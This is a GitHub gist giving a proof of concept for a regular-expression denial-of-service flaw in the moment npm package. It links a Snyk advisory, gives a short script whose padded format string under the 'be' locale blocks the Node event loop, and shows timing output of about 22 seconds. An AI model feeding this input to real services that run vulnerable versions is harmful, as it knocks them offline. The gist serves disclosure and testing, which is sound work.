Skip to content

Instantly share code, notes, and snippets.

@grnd

grnd/moment-redos-poc.md

Last active November 19, 2018 15:02
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save grnd/50192ce22681848a7de812d95241b7fc to your computer and use it in GitHub Desktop.
Save grnd/50192ce22681848a7de812d95241b7fc to your computer and use it in GitHub Desktop.
Download ZIP
PoC for ReDoS in `moment` npm package
Raw
moment-redos-poc.md

Details here: https://snyk.io/vuln/npm:moment:20161019

It takes just a 40 characters long string to block the event loop for about 20 seconds on a standard laptop, while each additional space character will double that time.

Example: moment-test.js

var m = require("moment");
m.locale("be");
m().format("D                               MMN MMMM");
$ time node moment-test.js
21.24s user 0.14s system 96% cpu 22.079 total
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment